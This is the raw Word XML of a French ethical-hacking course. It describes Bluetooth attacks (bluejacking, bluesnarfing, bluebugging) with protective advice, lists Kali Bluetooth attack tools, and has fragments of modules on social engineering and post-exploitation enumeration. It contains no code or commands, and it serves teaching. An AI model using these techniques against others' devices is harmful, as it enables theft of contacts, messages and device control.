        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le numéro d’identité du terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C649CD5" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une clé privée </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE149A8" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Un générateur aléatoire interne à la puce Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3874E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour chaque transaction, un nouveau numéro aléatoire est tiré pour chiffrer les données à transmettre </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA6393" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans un </w:t>
      </w:r>
      <w:r w:rsidRPr="00635AE4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scatternet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(réseau ad hoc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAC6A2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il faut procéder au début de la mise en relation, à un échange de cléf privées entre les processus de piconnets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(utilisateur de réseau ah hoc)</w:t>
      </w:r>
      <w:r w:rsidRPr="009367FF">
        <w:t xml:space="preserve"> indépendant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E331296" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="685CE73F" w14:textId="214A8C9B" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre </w:t>
      </w:r>
      <w:r w:rsidR="003214B9">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t> : attaques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F204529" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluejacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A179A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="32384364" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="006C2550" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="337E2201" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le bluejacking est une attaque relativement inoffensive lors de laquelle un pirate envoie des messages non sollicités à des appareils détectables dans la zone. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB4F91" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465820ED" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attaque est menée en exploitant la fonction de carte de visite électronique bluetooth comme support de message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4073A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C621D2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le pirate informatique ne peut accéder à aucune information ni intercepter aucun message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C68C1" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="501B8A6E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4B9A8164" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Vous pouvez vous protéger de ces spams non sollicités en mettant votre téléphone en mode caché, en mode invisible ou en mode non détectable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162B498" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="42B6E7D6" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14CE2">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le Blue jacking n’est donc ni plus ni moins qu’une méthode de pirata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">ge qui permet à un individu d’envoyer des messages anonymes à un appareil Bluetooth dans un certains rayon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8D48E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682F52C1" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A86AA06" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Tout d’abord, le pirate analyse son environnement à l’aide d’un appareil compatible Bluetooth, à la recherche d’autres appareils. En suites il envoie un message non sollicité aux périphérique détectés. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35A84F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7486A98D" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Le Bluejacking exploite une fonction Bluetooth de base qui permet aux appareils d’envoyer des messages à des contacts à portés. Il ne permet pas le détournement complet de l’appareil. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2371AB" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CC993F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le pirate ne peut qu’envoyer des messages non sollicités. Détournement ne se produit pas réellement parce que l’agresseur n’a jamais le contrôle de l’appareil de la victime. Au pire, Bluejacking est juste une sorte de SPAM. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FBD8F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB7EF36" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A60E9C6" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F50DD9" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluesnarfing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E210B28" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="64B5E8C0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Le Bluesnarfing est bien pire que le Bluejacking car il permet à un hacker d’accéder à certaines de vos informations privées. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF0B2E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="234CC019" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Dans ce type d’attaques, un pirate informatique utilise un logiciel spécial pour demander des informations à un appareil via le profil Bluetooth OBEX push. Cette attaque peut être effectuée contre des périphériques en mode invisibles mais cela demande un temps considérable pour y parvenir. Sans connaître le nom du périphérique. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272577F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="079389DE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le Bluesnarfing est donc un piratage de périphérique effectué lorsqu’un périphérique sans fil compatible Bluetooth reste constamment en mode découverte. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421CBE40" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="63BB645B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Il permet aux pirates d’accéder à distant aux données des périphériques Bluetooth, telles que : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705DF5C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="2756A045" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le calendrier </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F345C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La liste de contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698773B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les emails </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222C2AF" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les textos de l’utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93B2E1" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4F422C97" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Cette attaque est perpétrée à l’insu de la victime. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B5884E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="273ADDF2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Les périphériques Bluetooth sont vulnérables aux attaques de Bluesnarfing lorsqu’ils sont en mode découvrables car les pirates peuvent répondre aux requêtes d’autre périphérique Bluetooth. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18615CF1" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6A373CB9" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">La plupart des modes de découvertes des téléphones mobiles sont activés par défaut. A moins que le mode ne soit désactivé, un dispositif est donc par défaut sensible aux attaques de Buesnarfing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642187BB" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7560FACE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La seule façon de protéger complètement un appareil sans fil contre le Bluesnarfing est de désactivé le Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2482A3EE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De même, le fait de garder son téléphone en mode invisible offre une certaine protection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D794F0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Éteindre le Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63798CDC" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="002C115C" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="491DAD50" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="128EA44A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="054176A4" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="3B711731" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7C9393AE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Blue Bugging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44957518" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="34B9EF5D" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Lorsque que votre téléphone est en mode découverte, un pirate peut utiliser le même point d’entré que le Bluejacking et le Bluesnarfing pour prendre votre téléphone sous son control. La plupart des téléphones ne sont pas vulnérables au Blue Bugging, mais certains des premiers modèles dont le firewire est obsolète peuvent être piratées de cette façon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C208DDD" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="67EF3146" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les différents outils intégrés dans Kali pour pirater le Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E422A09" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="2B5392C8" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bluelog :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un outil d’étude. Il scanne la zone pour trouver les périphériques découvrables et les enregistrer dans un fichier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032D1A2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blueranger :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Un script Python simple qui utilise les pings i2cap pour localiser les périphériques Bluetooth et déterminer leurs distances approximatives. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0F88F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Btscanner :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cet outil basé sur une interface utilisateur graphiques recherche les périphériques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C7571" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spooftooph :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> logiciel de spoofing Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E254AE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bettercap :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B43C5">
        <w:t xml:space="preserve">Bettercap est le successeur d'Ettercap et comporte des modules d'attaque pour différents types de technologies radio et réseau, dont le Bluetooth. Bettercap peut traquer et attaquer des réseaux Wi-Fi, et par défaut, commence à énumérer les périphériques sur n'importe quel réseau sur lequel vous vous trouvez. Cette capacité est bien utile pour identifier et balayer des appareils Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D76EE0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="41C57525" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4F2BEA53" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="62C962D8" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="62E1D980" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="0D61E5F6" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7FBFB567" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="789F229B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="0BFF8D9F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="65E8C33C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7FC99341" w14:textId="01E33905" w:rsidR="00223B72" w:rsidRDefault="00B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Module 1</w:t>
      </w:r>
      <w:r w:rsidR="006100AD">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">C’est quoi la sécurité physique ?  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863177A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8894B0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La sécurité physique englobe toutes les mesures visant à protéger les personnes, les biens matériels et les infra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vidéosurveillance , d’alarmes et de dispositifs anti-incendie, ainsi que la formation personnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29062609" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">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 xml:space="preserve">Qu’est ce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 xml:space="preserve">Qu’est ce que l’ingénierie sociale ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DD7E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="335FABD4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:lastRenderedPageBreak/>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r>
        <w:t xml:space="preserve">Hameçonage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 xml:space="preserve">Talonnage (ex: se servire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(ex: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30F6FD84" w:rsidR="00223B72" w:rsidRPr="00534394" w:rsidRDefault="00B23609" w:rsidP="00714AD0">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_k92ico76p7jw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r>
        <w:t>Module</w:t>
      </w:r>
      <w:r w:rsidR="00E774D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006100AD">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Post-exploitation </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r>
        <w:t>Enumération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Chapitre 2 - Elévation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crucial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 activer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Enumération </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE55D68" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5D3D2690" w14:textId="270EDCF5" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>
        <w:t>L’énumération est un processus qui consiste à accéder aux services qui tournent derrière les ports ouverts,</w:t>
      </w:r>
      <w:r w:rsidR="00127426">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">découverts lors du scanning afin d’obtenir plus d’infos sur la cible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD3C9B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="470AB510" w14:textId="01FED4DC" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:r>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Les users et les groupe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B27C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Les tables de routage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0E62A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00B23609">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le noms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après avoir accéder à la cible, la première choses est d’identifier le contexte de l’utilisateur </w:t>
      </w:r>
    </w:p>
